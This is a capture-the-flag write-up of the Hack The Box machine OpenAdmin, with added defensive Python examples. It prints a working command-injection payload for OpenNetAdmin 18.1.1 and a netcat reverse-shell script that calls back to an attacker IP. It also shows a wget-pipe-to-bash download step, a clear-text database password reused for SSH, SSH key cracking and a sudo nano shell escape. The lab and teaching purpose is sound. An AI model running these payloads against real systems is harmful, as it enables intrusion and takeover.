In this post we will talk about OpenAdmin, the third challenge of the HTB Track “Intro to Dante”.

TL;DR
The attack kill chain/steps can be mapped to:
- Recon and Enumeration (HTTP and SSH services)
- Enumeration against the web service at 80/TCP
- Initial compromise by exploiting a Remote Command Execution against OpenNetAdmin v18.1.1
- Recon and Enumeration
- MySQL credentials in clear text
- Lateralization from www-data to jimmy by password reuse
- Lateralization from jimmy to joanna by abusing a misconfiguration in the apache2 internal environment
- Dictionary attack to crack the encrypted joanna SSH key
- Privilege escalation to root by abusing privilege elevation mechanisms (sudo)
Reconnaissance and Enumeration
During the reconnaissance with nmap the attacker identified the open ports 22/TCP and 80/TCP.

Web Services – 80/TCP
Directory Enumeration and Brute Force
In order to discover directories in the target HTTP service, the attacker used dirsearch to perform web discovery based on directory brute forcing.
dirsearch --url 'http://10.10.10.171/' -w /opt/SecLists/Discovery/Web-Content/big.txt -e ? --plain-text-report=openadmin-http-80-dirsearch-big.out -r -t 32 -R 3

Almost all directories checked at this point are some kind of rabbit hole. Based on that, the attacker falls back to enumeration again using other wordlists, but the same results are obtained.
When the same procedure is performed using DirBuster and the wordlist directory-list-2.3-medium.txt, the directory ONA appears.

Investigating this anomaly, and given that the word ONA does not exist in the wordlist used, it was identified that DirBuster performs URL crawling; in other words, DirBuster is capable of discovering new URLs from HTML elements.

Checking my tools, I discovered that my current versions of Gobuster and dirsearch do not perform crawling. Normally I use Burp Professional’s Discovery (which has crawling features) for pentesting web applications along with my tools; this time I didn’t consider opening my Burp (you know, Java is way too heavy) and this caused me to lose time.
So, based on the DirBuster output, I managed to find the reference to the /ONA directory inside the page at URL http://10.10.10.171/music/, at the login button.
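The point above is the difference between a wordlist-only tool and a crawler: the /ona path was never in the wordlist, it was in the page. The following script is an added example (not code from the original post) of what the crawling step does, written from the side of someone auditing what their own site links to: it extracts the URLs a browser would follow from a page, keeps the same-host paths, and reports which first-level directories a given wordlist would never have guessed. The HTML and the wordlist are constructed to mirror the /music/ login-button case described above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LinkExtractor(HTMLParser):
    """Collect the URLs referenced by attributes a browser follows or loads."""

    URL_ATTRS = {"a": "href", "link": "href", "form": "action",
                 "script": "src", "img": "src", "iframe": "src"}

    def __init__(self, base):
        super().__init__()
        self.base = base      # page URL; relative references resolve against it
        self.found = []

    def handle_starttag(self, tag, attrs):
        wanted = self.URL_ATTRS.get(tag)
        if not wanted:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.found.append(urljoin(self.base, value))


def same_host_paths(base, html):
    """Sorted, de-duplicated paths on the same host as the page being crawled."""
    parser = LinkExtractor(base)
    parser.feed(html)
    host = urlsplit(base).netloc
    return sorted({urlsplit(u).path for u in parser.found if urlsplit(u).netloc == host})


def not_in_wordlist(paths, wordlist):
    """First-level directories reachable by crawling that a wordlist scan would miss."""
    first_segments = {p.strip("/").split("/")[0] for p in paths if p.strip("/")}
    known = {w.lower() for w in wordlist}
    return sorted(s for s in first_segments if s.lower() not in known)


# Constructed page modelled on the /music/ landing page described in the write-up.
SAMPLE_HTML = """
<html><head><link rel="stylesheet" href="css/style.css"></head>
<body>
<a href="index.html">Home</a>
<a href="../ona/" class="btn">Login</a>
<a href="https://example.org/">Partner site</a>
<a href="mailto:contact@example.org">Contact</a>
<script src="/music/js/main.js"></script>
</body></html>
"""

# Constructed stand-in for a directory wordlist that lacks "ona".
SAMPLE_WORDLIST = ["admin", "images", "music", "login"]

if __name__ == "__main__":
    paths = same_host_paths("http://10.10.10.171/music/", SAMPLE_HTML)
    print("crawled paths:", paths)
    print("missed by wordlist:", not_in_wordlist(paths, SAMPLE_WORDLIST))
```

The external link and the mailto: reference are dropped because their host is not the target, while the relative "../ona/" resolves to /ona/ exactly as DirBuster resolved it.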

Probably this reference is made in other files too; at first, and until now, I haven’t checked all the directories and pages, for lazy reasons, but this is an important tip we must not forget: don’t fuck the methodology by leaving steps behind.
OpenNetAdmin HTTP
The ONA directory reveals the application called OpenNetAdmin at version 18.1.1.

Initial Compromise – OpenNetAdmin 18.1.1 – Remote Code Execution
The previously identified ONA application at URL http://10.10.10.171/ona, at version 18.1.1, has a publicly documented RCE vulnerability.
To confirm the RCE vulnerability, the attacker executes the id command through it.
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";id;echo \"END\"&xajaxargs[]=ping" "http://10.10.10.171/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

The id command reveals the privileges of user UID 33 (www-data).
To validate the delivery strategy, the attacker checks the existence of the curl command on the target machine using the RCE vulnerability again.
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";id;echo \"END\"&xajaxargs[]=ping" "http://10.10.10.171/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

In order to exploit the RCE vulnerability, the attacker creates a local file called shell on the attacker machine; at the moment of remote command execution, the target downloads and executes the content of this file. The malicious file contains shell script instructions that use mkfifo, netcat and I/O stream redirection to call back to the attacker machine and spawn a reverse shell.
cat shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 443 >/tmp/f
The shell file was delivered over an HTTP service provided by Python 3’s http.server module on the attacker machine, listening on port 80.
sudo python3 -m http.server 80
At this time, the attacker starts a handler to receive the connection using netcat.
nc -tvlp 443
In order to trigger the attack, the RCE vulnerability is abused once again, this time to obtain the reverse shell: the target machine downloads the shell file from the attacker machine and executes its content.
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";wget http://10.10.14.4/shell -O - | bash;echo \"END\"&xajaxargs[]=ping" "http://10.10.10.171/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
When the curl command is executed, the handler on the attacker machine receives the reverse shell on port 443/TCP under www-data privileges.
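Seen from the defender’s side, every request above has the same shape: a POST to /ona/ with xajax=window_submit and an xajaxargs[] value that starts with ip=> and then carries shell metacharacters where only an address or hostname belongs (the xajaxr value is also identical in every request, which looks like a hard-coded timestamp rather than a client clock, but that is not something to rely on). The standard Apache access log does not record POST bodies, so this check has to run where the body is visible: a reverse proxy, a WAF rule, or a ModSecurity audit log. The script below is an added example, not part of the original post, that applies an allowlist check to form-encoded request bodies; the sample bodies are constructed to mirror the requests in this write-up.

```python
import re
from urllib.parse import parse_qs

# Constructed request bodies modelled on the requests above; not a real capture.
SAMPLE_BODIES = [
    # legitimate ping tooltip: the ip=> argument is a plain address
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E10.10.10.5&xajaxargs[]=ping",
    # shape of the RCE payload from the write-up: metacharacters after ip=>
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    '&xajaxargs[]=ip%3D%3E;echo "BEGIN";id;echo "END"&xajaxargs[]=ping',
    # unrelated form post, not an xajax call at all
    "username=jimmy&password=test",
]

# A host argument to the tooltip should only ever be an IP address or hostname.
# Allowlisting the shape is safer than blacklisting ';', '|', '$(' and friends.
HOST_OK = re.compile(r"^[A-Za-z0-9.:_-]*$")


def inspect_body(body):
    """Return (key, value) pairs of xajax 'key=>value' arguments whose value is not a plain host."""
    params = parse_qs(body, keep_blank_values=True)   # also decodes %3D%3E back to '=>'
    if params.get("xajax") != ["window_submit"]:
        return []                                      # not an xajax submit; nothing to check
    findings = []
    for arg in params.get("xajaxargs[]", []):
        key, sep, value = arg.partition("=>")
        if sep and not HOST_OK.match(value):
            findings.append((key, value))
    return findings


def scan(bodies):
    """Indexes of the bodies in a batch that carry at least one suspicious argument."""
    return [i for i, body in enumerate(bodies) if inspect_body(body)]


if __name__ == "__main__":
    for i, body in enumerate(SAMPLE_BODIES):
        print(i, inspect_body(body))
```

Because the check is an allowlist on the argument value, it flags the payload regardless of which command is chained after the ip=> prefix, and it stays quiet on the benign tooltip request.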

Privilege Escalation (www-data to Jimmy)
While performing recon and enumeration against the system, the attacker found the credentials used by the application to connect to MySQL in the file /opt/ona/www/local/config/database_settings.inc.php.

To enumerate users, the attacker runs the Linux command getent with the parameter passwd.
$ getent passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
By password reuse, the attacker successfully authenticates as the jimmy user over SSH (and locally with su - jimmy on a TTY shell) with the MySQL password n1nj4W4rri0R!.
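The getent passwd listing above is worth reading the way an attacker reads it: out of roughly thirty accounts only root, jimmy and joanna have a real login shell, and those are exactly the accounts whose passwords must not match anything stored in an application config. The parser below is an added example, not from the original post; it reads passwd-format lines, lists the interactive accounts, and applies a few audit checks (extra UID 0 accounts, empty password fields, system accounts with a login shell). The first sample is an excerpt of the listing above; the two extra lines are constructed to show what the audit flags.

```python
from collections import namedtuple

PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid gecos home shell")

# Excerpt of the getent passwd listing above (copied from the write-up).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
"""

# Constructed lines (not from the box) that the audit should flag.
SUSPICIOUS_SAMPLE = PASSWD_SAMPLE + """\
backupsvc:x:0:0::/root:/bin/bash
legacy::1002:1002::/home/legacy:/bin/bash
"""

NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_passwd(text):
    """Parse passwd(5) lines into PasswdEntry records; raise on malformed input."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 colon-separated fields, got {len(fields)}")
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def interactive_accounts(entries):
    """Accounts that can actually log in: the ones whose passwords must be unique."""
    return [e.name for e in entries if e.shell not in NON_LOGIN_SHELLS]


def audit(entries):
    """(account, reason) pairs for entries that deserve a closer look."""
    findings = []
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, "extra UID 0 account"))
        if e.passwd == "":
            findings.append((e.name, "empty password field"))
        if 0 < e.uid < 1000 and e.shell not in NON_LOGIN_SHELLS:
            findings.append((e.name, f"system account with login shell {e.shell}"))
    return findings


if __name__ == "__main__":
    print("interactive:", interactive_accounts(parse_passwd(PASSWD_SAMPLE)))
    print("findings:", audit(parse_passwd(SUSPICIOUS_SAMPLE)))
```

On the real box the audit is clean; the weakness was not in passwd at all but in the fact that one of the three interactive accounts shared its password with the database user.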

Lateralization to Joanna
Under jimmy privileges, the attacker identifies a dangerous feature in the file /var/www/internal/main.php.

The file /etc/apache2/sites-available/internal.conf reveals that the internal website runs under joanna’s privileges and not under the default www-data privileges.

So, based on the shell_exec call in the main.php file, the attacker was able to obtain the encrypted private key (id_rsa) of the joanna user.

At this point, the option is to brute-force the encrypted RSA key using the hint found earlier in the main.php file, which says:
Don’t forget your “ninja” password
Hint from main.php
The logical procedure is to get a wordlist like rockyou.txt, filter it for strings containing ‘ninja’, then perform the brute force. But, at this point, maybe for lazy reasons, I just replaced the shell_exec content with reverse shell instructions, almost the same as before.

To execute main.php, the attacker performs the same curl command as before. Once executed, the reverse shell is received by the attacker’s handler, previously started on port 444/TCP. The reverse shell session runs under joanna’s privileges.

Compromising User flag
With joanna privileges, the attacker was able to compromise the user flag available in the file /home/joanna/user.txt.

Privilege Escalation – Joanna to Root
In order to crack the encryption of the previously found id_rsa key, the attacker generates a wordlist based on the string ninja, using rockyou.txt as the source.

Converting the key to John’s format using ssh2john (https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/ssh2john.py):
python ssh2john.py sshkey > id_rsa-joanna.john

To perform the dictionary attack, the file id_rsa-joanna.john was passed to John with the previously created wordlist. The procedure reveals the passphrase bloodninjas.


With a TTY shell under joanna privileges, the attacker was able to list the privilege elevation capabilities provided by the sudo mechanism and identified permission to execute nano as root without a password.

To escape nano and spawn a shell, the attacker performs the first procedure documented at GTFOBins (https://gtfobins.github.io/gtfobins/nano/).
sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0
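The sudo rule behind this step is the kind of entry a sudoers review should catch before anyone runs sudo -l: a text editor with a documented shell escape, runnable as root, with NOPASSWD on top. The script below is an added example, not code from the original post; it parses sudoers-style rule lines and reports rules that hand a shell-escaping editor to root. The sudoers excerpt is constructed: the joanna line reconstructs the rule this write-up describes, and the editor set is a minimal illustration (a real review checks every allowed binary against the GTFOBins list referenced above).

```python
import os
import re

# Constructed sudoers excerpt. The joanna line reconstructs the rule described in
# the write-up (nano as root, no password); the rest are ordinary defaults.
SUDOERS_SAMPLE = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
joanna ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
"""

# Minimal illustration only; consult GTFOBins for the full set of risky binaries.
SHELL_ESCAPE_EDITORS = {"nano", "vi", "vim"}

# who host=(runas) [TAG: ...] cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Parse user-specification lines; Defaults, comments and blank lines are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(user:group)" -> user part; an omitted runas clause means root
        runas = (m.group("runas") or "root").split(":")[0]
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({"who": m.group("who"), "runas": runas,
                      "nopasswd": "NOPASSWD" in tags, "cmds": cmds})
    return rules


def audit_sudoers(rules):
    """(who, program, nopasswd) for rules that let an editor with a shell escape run as root."""
    findings = []
    for r in rules:
        if r["runas"] not in ("ALL", "root"):
            continue
        for cmd in r["cmds"]:
            prog = os.path.basename(cmd.split()[0])
            if prog in SHELL_ESCAPE_EDITORS:
                findings.append((r["who"], prog, r["nopasswd"]))
    return findings


if __name__ == "__main__":
    for who, prog, nopasswd in audit_sudoers(parse_sudoers(SUDOERS_SAMPLE)):
        print(f"{who}: {prog} as root{' without password' if nopasswd else ''}")
```

Restricting the rule to a single file path (/opt/priv) does not help here: the finding is about the program, because once nano runs as root its escape reaches a root shell regardless of which file was opened.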

Compromising Root flag
With the shell under root privileges, the attacker compromises the root flag.

Considerations
Classic Linux box; it reminds me not to get fucked by fucking up the methodology.
The first time I played, at the joanna privilege escalation to root, I was able to execute the sudo -l command inside a reverse shell to list which commands I could perform with sudo, and it worked. When I came back to write the writeup and decided to collect some evidence, trying to reproduce this step, it didn’t work anymore for an unknown reason.
I checked a few things to try to identify wtf is going on; I checked environment variables, loaded the .profile, etc., but nothing. Of course, further investigation could identify the problem and solution, but I will leave this topic open for now due to time limitations.

References
- GTFOBins nano: https://gtfobins.github.io/gtfobins/nano/
- DirBuster: https://tools.kali.org/web-applications/dirbuster
- OpenNetAdmin 18.1.1 – Remote Code Execution: https://www.exploit-db.com/exploits/47691
